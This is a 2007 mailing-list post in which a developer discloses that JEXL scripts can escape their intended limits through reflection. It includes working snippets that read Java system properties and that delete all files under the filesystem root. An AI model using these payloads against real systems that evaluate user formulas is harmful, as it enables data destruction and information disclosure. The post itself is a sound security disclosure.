commons-user mailing list archives

From "Trevor Harrison" <trevorsharri...@gmail.com>
Subject Re: JEXL security issue with system properties
Date Fri, 05 Oct 2007 15:42:41 GMT
Replying to myself:

On 10/4/07, Trevor Harrison <trevorsharrison@gmail.com> wrote:
> While looking for other ways to 'break' out, I started thinking about
> classloaders.  I haven't succeeded in getting a classloader yet in a
> script, but if I could, it would be bad for my intended usage of JEXL
> (as a fairly secure way of executing user supplied formulas).
>
> // this doesn't work
> cl = intClazz.getClassLoader();  // this fails, returns a null

Well, still not sure why that method is returning a null for the
classloader, but if I call (the much simpler) clazz.forName(), I can
get a reference to a class:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.lang.System");
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);

which successfully gets me the system properties.  Which is probably
the least of my worries, considering I could do something like:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.io.File");
m = clazz.getMethod("listRoots", null);
roots = m.invoke(null, null);
files = roots[0].listFiles();
foreach( file in files )
{
  file.delete();
}

---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org

